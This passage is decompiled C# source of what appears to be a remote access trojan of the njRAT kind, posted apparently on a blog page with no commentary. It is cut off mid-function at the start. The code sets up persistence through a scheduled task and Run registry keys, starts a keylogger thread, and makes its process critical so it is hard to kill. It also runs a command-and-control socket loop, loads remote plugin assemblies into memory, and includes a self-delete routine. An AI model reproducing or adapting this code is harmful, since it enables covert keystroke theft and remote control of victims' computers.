     Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject(Operators.ConcatenateObject("schtasks /create /tn NYAN /tr \"", executablePath), "\" /sc minute /mo 1")), AppWinStyle.Hide, false, -1);
    }
    catch (Exception projectError5)
    {
     ProjectData.SetProjectError(projectError5);
     ProjectData.ClearProjectError();
    }
   }
   if (Interaction.Command() != null)
   {
    try
    {
     OK.F.Registry.CurrentUser.SetValue("di", "!");
    }
    catch (Exception ex)
    {
     ProjectData.SetProjectError(ex);
     Exception ex2 = ex;
     ProjectData.SetProjectError(ex2);
     Exception ex3 = ex2;
     ProjectData.ClearProjectError();
     ProjectData.ClearProjectError();
    }
    Thread.Sleep(5000);
   }
   bool flag = false;
   OK.MT = new Mutex(true, OK.RG, out flag);
   if (!flag)
   {
    ProjectData.EndApp();
   }
   OK.INS();
   if (!OK.Idr)
   {
    OK.EXE = OK.LO.Name;
    OK.DR = OK.LO.Directory.Name;
   }
   Thread thread = new Thread(OK.RC, 1);
   thread.Start();
   try
   {
    OK.kq = new kl();
    Thread thread2 = new Thread(OK.kq.WRK, 1);
    thread2.Start();
   }
   catch (Exception ex4)
   {
    ProjectData.SetProjectError(ex4);
    Exception ex5 = ex4;
    ProjectData.SetProjectError(ex5);
    Exception ex6 = ex5;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   int num = 0;
   string left = "";
   if (OK.BD)
   {
    try
    {
     SystemEvents.SessionEnding += OK._Lambda__2;
     OK.pr(1);
    }
    catch (Exception ex7)
    {
     ProjectData.SetProjectError(ex7);
     Exception ex8 = ex7;
     ProjectData.SetProjectError(ex8);
     Exception ex9 = ex8;
     ProjectData.ClearProjectError();
     ProjectData.ClearProjectError();
    }
   }
   while (true)
   {
    Thread.Sleep(1000);
    if (!OK.Cn)
    {
     left = "";
    }
    Application.DoEvents();
    try
    {
     num++;
     if (num == 5)
     {
      try
      {
       Process.GetCurrentProcess().MinWorkingSet = (IntPtr)1024;
      }
      catch (Exception ex10)
      {
       ProjectData.SetProjectError(ex10);
       Exception ex11 = ex10;
       ProjectData.SetProjectError(ex11);
       Exception ex12 = ex11;
       ProjectData.ClearProjectError();
       ProjectData.ClearProjectError();
      }
     }
     if (num >= 8)
     {
      num = 0;
      string text = OK.ACT();
      if (Operators.CompareString(left, text, false) != 0)
      {
       left = text;
       OK.Send("act" + OK.Y + text);
      }
     }
     if (OK.Isu)
     {
      try
      {
       if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.CurrentUser.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false))
       {
        OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
       }
      }
      catch (Exception ex13)
      {
       ProjectData.SetProjectError(ex13);
       Exception ex14 = ex13;
       ProjectData.SetProjectError(ex14);
       Exception ex15 = ex14;
       ProjectData.ClearProjectError();
       ProjectData.ClearProjectError();
      }
      try
      {
       if (Operators.ConditionalCompareObjectNotEqual(RuntimeHelpers.GetObjectValue(OK.F.Registry.LocalMachine.GetValue(OK.sf + "\\" + OK.RG, "")), "\"" + OK.LO.FullName + "\" ..", false))
       {
        OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).SetValue(OK.RG, "\"" + OK.LO.FullName + "\" ..");
       }
      }
      catch (Exception ex16)
      {
       ProjectData.SetProjectError(ex16);
       Exception ex17 = ex16;
       ProjectData.SetProjectError(ex17);
       Exception ex18 = ex17;
       ProjectData.ClearProjectError();
       ProjectData.ClearProjectError();
      }
     }
    }
    catch (Exception ex19)
    {
     ProjectData.SetProjectError(ex19);
     Exception ex20 = ex19;
     ProjectData.SetProjectError(ex20);
     Exception ex21 = ex20;
     ProjectData.ClearProjectError();
     ProjectData.ClearProjectError();
    }
   }
  }
 }

 public static string md5(byte[] B)
 {
  B = new MD5CryptoServiceProvider().ComputeHash(B);
  string text = "";
  byte[] array = B;
  for (int i = 0; i < array.Length; i = checked(i + 1))
  {
   byte b = array[i];
   text += b.ToString("x2");
  }
  return text;
 }

 [DllImport("ntdll")]
 private static extern int NtSetInformationProcess(IntPtr hProcess, int processInformationClass, ref int processInformation, int processInformationLength);

 public static object Plugin(byte[] b, string c)
 {
  Module[] modules = Assembly.Load(b).GetModules();
  foreach (Module module in modules)
  {
   Type[] types = module.GetTypes();
   foreach (Type type in types)
   {
    if (type.FullName.EndsWith("." + c))
    {
     return module.Assembly.CreateInstance(type.FullName);
    }
   }
  }
  return null;
 }

 public static void pr(int i)
 {
  try
  {
   OK.NtSetInformationProcess(Process.GetCurrentProcess().Handle, 29, ref i, 4);
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
 }

 public static void RC()
 {
  checked
  {
   while (true)
   {
    OK.lastcap = "";
    if (OK.C != null)
    {
     long num = -1L;
     int num2 = 0;
     try
     {
      while (true)
      {
       IL_0021:
       num2++;
       if (num2 == 10)
       {
        num2 = 0;
        Thread.Sleep(1);
       }
       if (OK.Cn)
       {
        if (OK.C.Available < 1)
        {
         OK.C.Client.Poll(-1, SelectMode.SelectRead);
        }
        while (true)
        {
         if (OK.C.Available <= 0)
         {
          break;
         }
         string text;
         if (num == -1)
         {
          text = "";
          while (true)
          {
           int num3 = OK.C.GetStream().ReadByte();
           switch (num3)
           {
           case -1:
            break;
           case 0:
            goto IL_00cb;
           default:
            text += Conversions.ToString(Conversions.ToInteger(Strings.ChrW(num3).ToString()));
            continue;
           }
           break;
          }
          break;
         }
         OK.b = new byte[OK.C.Available + 1 - 1 + 1];
         long num4 = num - OK.MeM.Length;
         if (OK.b.Length > num4)
         {
          OK.b = new byte[(int)(num4 - 1) + 1 - 1 + 1];
         }
         int count = OK.C.Client.Receive(OK.b, 0, OK.b.Length, SocketFlags.None);
         OK.MeM.Write(OK.b, 0, count);
         if (OK.MeM.Length == num)
         {
          num = -1L;
          Thread thread = new Thread(OK._Lambda__1, 1);
          thread.Start(OK.MeM.ToArray());
          thread.Join(100);
          OK.MeM.Dispose();
          OK.MeM = new MemoryStream();
         }
         goto IL_0021;
         IL_00cb:
         num = Conversions.ToLong(text);
         text = "";
         if (num == 0)
         {
          OK.Send("");
          num = -1L;
         }
         if (OK.C.Available <= 0)
         {
          goto IL_0021;
         }
        }
       }
       break;
      }
     }
     catch (Exception ex)
     {
      ProjectData.SetProjectError(ex);
      Exception ex2 = ex;
      ProjectData.SetProjectError(ex2);
      Exception ex3 = ex2;
      ProjectData.ClearProjectError();
      ProjectData.ClearProjectError();
     }
    }
    do
    {
     try
     {
      if (OK.PLG != null)
      {
       NewLateBinding.LateCall(RuntimeHelpers.GetObjectValue(OK.PLG), null, "clear", new object[0], null, null, null, true);
       OK.PLG = null;
      }
     }
     catch (Exception ex4)
     {
      ProjectData.SetProjectError(ex4);
      Exception ex5 = ex4;
      ProjectData.SetProjectError(ex5);
      Exception ex6 = ex5;
      ProjectData.ClearProjectError();
      ProjectData.ClearProjectError();
     }
     OK.Cn = false;
    }
    while (!OK.connect());
    OK.Cn = true;
   }
  }
 }

 public static byte[] SB(ref string S)
 {
  return Encoding.UTF8.GetBytes(S);
 }

 public static bool Send(string S)
 {
  return OK.Sendb(OK.SB(ref S));
 }

 public static bool Sendb(byte[] b)
 {
  if (!OK.Cn)
  {
   return false;
  }
  try
  {
   FileInfo lO = OK.LO;
   lock (lO)
   {
    if (!OK.Cn)
    {
     return false;
    }
    MemoryStream memoryStream = new MemoryStream();
    string text = b.Length.ToString() + "\0";
    byte[] array = OK.SB(ref text);
    memoryStream.Write(array, 0, array.Length);
    memoryStream.Write(b, 0, b.Length);
    OK.C.Client.Send(memoryStream.ToArray(), 0, checked((int)memoryStream.Length), SocketFlags.None);
   }
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   try
   {
    if (OK.Cn)
    {
     OK.Cn = false;
     OK.C.Close();
    }
   }
   catch (Exception ex4)
   {
    ProjectData.SetProjectError(ex4);
    Exception ex5 = ex4;
    ProjectData.SetProjectError(ex5);
    Exception ex6 = ex5;
    ProjectData.ClearProjectError();
    ProjectData.ClearProjectError();
   }
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return OK.Cn;
 }

 public static bool STV(string n, object t, RegistryValueKind typ)
 {
  bool result;
  try
  {
   OK.F.Registry.CurrentUser.CreateSubKey("Software\\" + OK.RG).SetValue(n, RuntimeHelpers.GetObjectValue(RuntimeHelpers.GetObjectValue(t)), typ);
   result = true;
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   result = false;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  return result;
 }

 [MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
 public static void UNS()
 {
  string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
  string[] logicalDrives = Directory.GetLogicalDrives();
  string[] array = logicalDrives;
  foreach (string programFiles in array)
  {
   try
   {
    if (File.Exists(programFiles + OK.RG))
    {
     File.Delete(programFiles + OK.RG);
    }
   }
   catch (Exception projectError)
   {
    ProjectData.SetProjectError(projectError);
    ProjectData.ClearProjectError();
   }
  }
  OK.pr(0);
  OK.Isu = false;
  try
  {
   OK.F.Registry.CurrentUser.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false);
  }
  catch (Exception ex)
  {
   ProjectData.SetProjectError(ex);
   Exception ex2 = ex;
   ProjectData.SetProjectError(ex2);
   Exception ex3 = ex2;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   OK.F.Registry.LocalMachine.OpenSubKey(OK.sf, true).DeleteValue(OK.RG, false);
  }
  catch (Exception ex4)
  {
   ProjectData.SetProjectError(ex4);
   Exception ex5 = ex4;
   ProjectData.SetProjectError(ex5);
   Exception ex6 = ex5;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   if (OK.HIDE_ME)
   {
    File.SetAttributes(Interaction.Environ(OK.DR) + "\\" + OK.EXE, FileAttributes.Normal);
   }
   string fileNameWithoutExtension = Path.GetFileNameWithoutExtension(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
   File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + fileNameWithoutExtension + ".url");
   File.Delete(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + OK.RG);
  }
  catch (Exception ex7)
  {
   ProjectData.SetProjectError(ex7);
   Exception ex8 = ex7;
   ProjectData.SetProjectError(ex8);
   Exception ex9 = ex8;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   OK.F.Registry.CurrentUser.OpenSubKey("Software", true).DeleteSubKey(OK.RG, false);
  }
  catch (Exception ex10)
  {
   ProjectData.SetProjectError(ex10);
   Exception ex11 = ex10;
   ProjectData.SetProjectError(ex11);
   Exception ex12 = ex11;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  try
  {
   Interaction.Shell("cmd.exe /c ping 0 -n 2 & del \"" + OK.LO.FullName + "\"", AppWinStyle.Hide, false, -1);
  }
  catch (Exception ex13)
  {
   ProjectData.SetProjectError(ex13);
   Exception ex14 = ex13;
   ProjectData.SetProjectError(ex14);
   Exception ex15 = ex14;
   ProjectData.ClearProjectError();
   ProjectData.ClearProjectError();
  }
  ProjectData.EndApp();
 }

 public static byte[] ZIP(byte[] B)
 {
  MemoryStream memoryStream = new MemoryStream(B);
  GZipStream gZipStream = new GZipStream(memoryStream, CompressionMode.Decompress);
  byte[] array = new byte[4];
  checked
  {
   memoryStream.Position = memoryStream.Length - 5;
   memoryStream.Read(array, 0, 4);
   int num = BitConverter.ToInt32(array, 0);
   memoryStream.Position = 0L;
   byte[] array2 = new byte[num - 1 + 1 - 1 + 1];
   gZipStream.Read(array2, 0, num);
   gZipStream.Dispose();
   memoryStream.Dispose();
   return array2;
  }
 }
}

No comments:

Post a Comment